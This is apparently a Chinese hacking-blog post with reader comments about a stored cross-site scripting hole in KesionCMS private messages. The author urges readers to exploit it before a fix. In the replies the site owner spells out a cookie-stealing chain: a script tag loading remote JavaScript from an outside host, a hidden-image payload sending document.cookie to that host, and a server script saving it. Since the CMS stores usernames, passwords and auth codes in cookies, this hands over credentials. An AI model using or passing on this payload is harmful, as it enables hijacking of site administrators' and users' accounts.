用户后台发信箱标题直接插入JS脚本

收信者即会中招,偶对管理员进行了测试! 不过2分钟就收到信了!

科迅CMS会将用户、密码、认证码存入COOKIE。。。

然后你懂得!!!

漏洞已反馈,发帖之时还未修复,想X的童鞋速度!

留言评论(旧系统):

XXX @ 2011-12-03 23:22:55

老核,求js

本站回复:

这个很容易吧,例如:<script src='http://lcx.cc/xss.js'></script>,然后爱干啥干啥了。。。

【小易】 @ 2012-04-15 15:09:37

老大求个完整的JS。不要比如因为不知道针对科讯的xxs结构

本站回复:

晕,几行简单的记录cookie脚本,你自己找一下,网上很多。 那个插入,是直接插入脚本:<script src="http://*.*.*/*.js"></sctipt>

【小易】 @ 2012-04-15 18:27:42

老大没找到,不容易找,我是你的粉丝经常来的网站学习,麻烦你发一份给我bidwae@gmail.com

本站回复:

我只告诉你方法,具体脚本自己写,这有助于你的进步: 1、XSS 插入:<script src="http://lcx.cc/a.js"></script>,作用:远程调用 js 并执行。 2、a.js 中,需要一段获取cookies并发送的代码,最简单的例如: document.write("<img src='http://lcx.cc/a.asp?cookie="+encodeURIComponent(document.cookie)+"' width='0' height='0' />"); 3、a.asp 中,只需要接收发送过来的参数并保存为文件就行了,很简单。 另外,不是不容易找,是你根本就没找!

【小易】 @ 2012-04-16 09:48:47

谢谢大老的指教,我会了。

本站回复:

\(^o^)/